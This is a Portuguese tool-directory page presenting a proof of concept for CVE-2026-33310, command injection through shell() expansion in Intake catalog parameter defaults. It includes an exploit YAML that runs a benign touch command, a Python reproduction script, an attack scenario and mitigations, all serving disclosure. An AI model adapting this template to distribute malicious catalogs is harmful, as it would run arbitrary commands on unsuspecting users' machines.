Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33310 — Prova de conceito demonstrando injeção de comandos via expansão shell() em valores padrão de parâmetros de catálogos Intake, com YAML de exploit e script de reprodução. | Kitploit
Ferramentas/GitHubGitHub/redyank/cve-2026-33310
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoSegurança WebComando e Controle
GitHubredyank/cve-2026-33310

CVE-2026-33310

Prova de conceito demonstrando injeção de comandos via expansão shell() em valores padrão de parâmetros de catálogos Intake, com YAML de exploit e script de reprodução.

Ver Repositório
17há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33310

CVE-2026-33310 (Injeção de Comando via Expansão shell() em Valores Padrão de Parâmetros)

Resumo

A sintaxe shell() dentro de valores padrão de parâmetros parece ser expandida automaticamente durante o processo de análise do catálogo. Se um catálogo contiver um valor padrão de parâmetro como shell(), o comando pode ser executado quando a fonte do catálogo for acessada. Isso significa que, se um usuário carregar um YAML de catálogo malicioso, comandos incorporados podem ser executados no sistema host. Esse comportamento pode potencialmente ser classificado como CWE-78: Injeção de Comando no Sistema Operacional / Expansão de Shell Insegura.

Detalhes

O problema parece ter origem em como os valores padrão de parâmetros são expandidos quando uma fonte de catálogo é acessada.

Durante o carregamento do catálogo e o acesso à fonte:

O Intake resolve os valores padrão de parâmetros A função responsável por expandir os padrões processa a sintaxe shell() A expressão shell() aciona a execução de um subprocesso Como isso ocorre durante a avaliação do catálogo, o comando pode ser executado antes que o usuário interaja explicitamente com o próprio conjunto de dados.

A lógica afetada parece envolver:

root@kitploit:~
expand_defaults()

e mecanismos relacionados de análise de parâmetros.

PoC

exploit.yaml

root@kitploit:~
metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "Testando expansão de shell em parâmetros"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "Parâmetro de Teste"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

root@kitploit:~
import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] Arquivo de prova existe antes: {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("Acessando fonte...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" Erro durante a execução: {e}")

if os.path.exists(PROOF_FILE):
    print(f" Execução de comando confirmada, Encontrado: {PROOF_FILE}")
else:
    print("A execução de comando não ocorreu.")

Cenário de Ataque

Um cenário de ataque potencial poderia ser:

  1. Um atacante publica um arquivo YAML de catálogo Intake malicioso
  2. A vítima baixa ou carrega o catálogo
  3. A vítima acessa uma entrada de fonte no catálogo
  4. Os padrões de parâmetros são expandidos
  5. A expressão shell() aciona a execução do comando incorporado

Impacto

Se esse comportamento for confirmado como não intencional, um atacante poderia distribuir um arquivo de catálogo malicioso via:

  • Repositórios Git
  • conjuntos de dados compartilhados
  • URLs
  • fluxos de trabalho de ciência de dados
  • Qualquer usuário que carregue o catálogo poderia executar comandos sem saber, com seus privilégios de usuário local.

Recomendação

Mitigações possíveis poderiam incluir:

  • desabilitar a expansão shell() por padrão
  • exigir um sinalizador explícito de aceitação (por exemplo, allow_shell=True)
  • restringir a execução de shell para catálogos carregados de fontes não confiáveis Por favor, informe se informações adicionais ou testes são necessários. Estou à disposição para ajudar com análises adicionais ou validação.
Baixar ferramenta